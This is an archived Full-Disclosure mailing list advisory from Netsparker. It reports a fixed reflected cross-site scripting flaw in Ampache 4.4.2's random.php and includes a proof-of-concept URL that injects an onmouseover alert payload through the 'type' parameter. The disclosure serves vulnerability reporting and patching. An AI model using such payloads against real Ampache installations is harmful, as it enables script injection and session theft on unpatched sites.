lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 21 Jul 2021 14:41:20 +0200
From: Daniel Bishtawi via Fulldisclosure <fulldisclosure@...lists.org>
To: fulldisclosure@...lists.org, vuln@...unia.com, bugs@...uritytracker.com, 
 submissions@...ketstormsecurity.org
Subject: [FD] Cross-site Scripting vulnerability in Ampache 4.4.2

Hello,

We are informing you about a Cross-site Scripting vulnerability in Ampache
4.4.2.

Information
--------------------
Advisory by Netsparker
Name: Cross-site Scripting vulnerability in Ampache 4.4.2
Affected Software: Ampache
Affected Versions: 4.4.2
Homepage: http://ampache.org/
Vulnerability: Cross-Site Scripting
Severity: High
Status: Fixed
CVSS Score (3.0): 7.4 (High)
Netsparker Advisory Reference: NS-21-003

Technical Details
--------------------

Cross-site scripting in Random.php

URL:
http://alihost:1134/random.php?action=get_advanced&type=%27%22%20onmouseover%3dalert(0x0002DE)%20
Parameter Name: type
Parameter Type: GET
Attack Pattern: %27%22+ns%3dnetsparker(0x0002DE)+

For more information:
https://www.netsparker.com/web-applications-advisories/ns-21-003-cross-site-scripting-in-ampache/

Regards,

Daniel Bishtawi

Marketing Administrator | Netsparker
e:  daniel.bishtawi@...sparker.com

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists